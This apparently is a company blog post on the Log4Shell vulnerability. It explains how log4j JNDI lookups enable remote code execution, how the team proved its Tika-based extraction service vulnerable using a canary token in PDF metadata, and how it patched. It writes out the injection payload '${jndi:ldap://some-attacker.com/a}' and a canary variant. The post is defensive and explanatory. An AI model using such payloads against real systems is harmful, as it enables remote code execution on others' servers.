Exploring the Log4Shell Vulnerability

Jan Hecking — 4/4/2023 — 7 Min Read

How we determined whether our software is susceptible to the Log4Shell vulnerability, crafted a demo exploit, and then resolved the issue.

By now everyone should have heard of the recent zero-day remote code execution (RCE) vulnerability in the popular Apache Log4j library. First announced on December 9, 2021 on Twitter, and later published as CVE-2021--44228, this vulnerability has kept teams busy patching their services for the past month.

At Borneo, we do not use a lot of Java in our own software stack. So when checking how our Borneo software might be affected by this vulnerability, we could focus our attention on just a single microservice. This service, called the Extraction service, uses the open-source Apache Tika software library to extract plain text from various file formats such as PDFs, Office documents, etc. This is required for Borneo to detect sensitive information in such documents. And since Apache Tika is implemented in Java, this Extraction service was also implemented using the Java-based Spring Boot framework, and uses the vulnerable log4j2 library for logging.

Understanding the log4j vulnerability

Tl;dr --- If a user of your application controls a string, that at any point gets included in a log message which gets logged using a vulnerable version of log4j, that user can instruct your application to load a piece of executable code from a remote server the user controls, and have it execute that code!

To understand if and how the log4j RCE vulnerability might be exploited in our Extraction service, it is first necessary to understand how the vulnerability works. log4j is a very flexible logging library and one of its most powerful features is property substitution, that is, the ability to include placeholder values in various places that will be resolved into concrete value at run-time. Up to, and including version 2.14.0, property substitution was also (by default) enabled in logging messages. That means, if an application includes a logging statement like logger.info("${name}"), then log4j will try to resolve the true value of ${name} whenever that logging statement gets called. Not only that, but if the application includes a logging statement like logger.info("value: {}", value) and the value variable has a runtime value of "${name}", then log4j will also attempt to resolve the ${name} placeholder. How log4j tries to resolve the value of ${name} depends on the given name itself. While name can refer to a property value specified in the log4j configuration, log4j also supports various prefixes that allow even more dynamic lookup of property values. For example, for a placeholder like ${env.MY_ENV} log4j will replace it with the value of the MY_ENV environment variable at runtime, based on the env: prefix. To summarize, if an application logs a message which includes a run-time variable, and that variable value includes a string like "${name}", then log4j (before v2.15.0) will automatically attempt to resolve the given name using a variety of schemes. By now it should be clear how this can be problematic, because in many cases the value of such variables included in log messages might be fully, or partially, be controlled by a user. This is akin to using a user-controlled variable to construct an SQL statement, which is then sent to a database server, and which could be exploited using a SQL-injection attack.

What makes this vulnerability really critical, though, is the fact that log4j also supports replacing property values using the Java Naming and Directory Interface (JNDI) via the jndi: property name prefix. JNDI itself is a very flexible protocol that allows clients to discover and look up data as well as Java objects by name from a variety of different sources. One typical use --- according to the JNDI wikipedia page --- is to connect a Java application to an external directory service such as an LDAP server. Without going further into detail about the Lightweight Directory Access Protocol (LDAP), suffice it to say that this combination of JDNI and LDAP now enables us to lookup, and retrieve, Java objects (i.e. executable Java code!) from a remote LDAP server, and execute it! And all just be including a property "name" in a log message, such as ${jndi:ldap://some-attacker.com/a}!

Determining whether Borneo's Extraction service was vulnerable

Now that we understand how this log4j vulnerability works, we have a better idea of how the vulnerability could be exploited in a service such as our aforementioned Borneo Text Extraction service, which --- at the time --- included a vulnerable version of log4j. The extraction service takes as input arbitrary files, which have been fetched from a remote location. If, at any point, the service would log any text content extracted from the file, then an attacker could craft a malicious file and use that to trigger the vulnerability, if the attacker can get the extraction service to process the file. Of course, the extraction service does not log the actual text contents of the files it processes. That content might contain sensitive information after all. But depending on the file type, Apache Tika also extracts additional metadata from the file, such as the document author or title, the name of the application which created the file, and many more. Some of that metadata can be useful for subsequent processing steps, and as it turns out, the extraction service did indeed log certain extracted file metadata under specific conditions.

Crafting an exploit

Now that we knew that the extraction service might indeed be vulnerable, the fun part of trying to craft an exploit began. At this point, we know that if we can craft a malicious file which includes a string such as ${jndi:ldap://some-attacker.com/a} somewhere in the file metadata, and get the extraction service to process that file, that should trigger the log4j RCE vulnerability. Now, setting up an LDAP server, and getting it to return a malicious payload in response to the request triggered by the ${jndi:ldap://some-attacker.com/a} payload, would have been quite a bit of work. Instead, we decided it would be good enough (or bad enough, as you will) to show that we could get the extraction service to initiate the request to the address in the attack payload, i.e. some-attacker.com. Fortunately, even that step was made easy, thanks to the fine folks at Thinkst Canary and their free Canary Tokens service! Using this service, we created a new Log4Shell canary token of the form ${jndi:ldap://x${hostName}.L4J.o26h...pzt8.canarytokens.com/a}. If we can get the Extraction service to include this token in a log4j log message, the service should attempt to contact the Canary Tokens service, which would record the request and notify us via email.

To create a document that includes this token, and that Apache Tika would be able to extract it from, we simply created a plain text file, and used the macOS print dialog to turn it into a PDF document using the "Save as PDF" functionality:

(Converting a plain text file into a PDF)

When creating the PDF document, macOS can set some additional document attributes, such as title, author, etc. We used this to include the attack payload in the document:

(Including our canary token in the PDF metadata)

Using the resulting file we were able to trigger the log4j vulnerability easily and immediately got a notification that our canary token was triggered, via email:

(Email notification when the canary token gets triggered)

Other possible attack vectors

The attack vector we managed to exploit in our own extraction service, via file metadata extracted by Apache Tika, is obviously quite specific. But all that is really necessary is that a potential attacker has some way to control any string, which will get logged by a vulnerable application. It has been reported, for example, that simply changing an iPhone's name was enough to trigger the vulnerability in Apple's servers.

Potentially malicious user input can come from many sources, including form fields in websites, HTTP request headers such as the User-Agent header, user profile data in mobile applications, any kind of user-generated content, etc. As always, it is best to treat all such input as potentially dangerous and apply strict input filtering before the content is used in any way. Of course, that is easier said, than done, as the wide-spread exploitation of this vulnerability shows.

Addressing the vulnerability

Now that we had definite proof that our extraction service was vulnerable, we set to work to address the vulnerability and patch all deployed services --- including our customers! --- as quickly as possible. The Apache log4j team had quickly released a new version 2.15.0 of the library, which disables the problematic property substitution in log messages. Since we didn't depend on this feature anyway, updating our copy of the library to a non-vulnerable library version was a quick fix. Since then, several other, related vulnerabilities have been discovered in the log4j library, and at present, version 2.17.1 is the latest released version, and the version that we are now using as well. With the attention of many security researchers focused on the log4j library at the moment, it is quite likely that more vulnerabilities will be discovered over the coming weeks and months, but we are prepared to keep on top of things and patch our systems as and when necessary.

Many thanks to the LunaSec team, which has been posting accurate and timely information about this so-called log4shell vulnerability on their blog!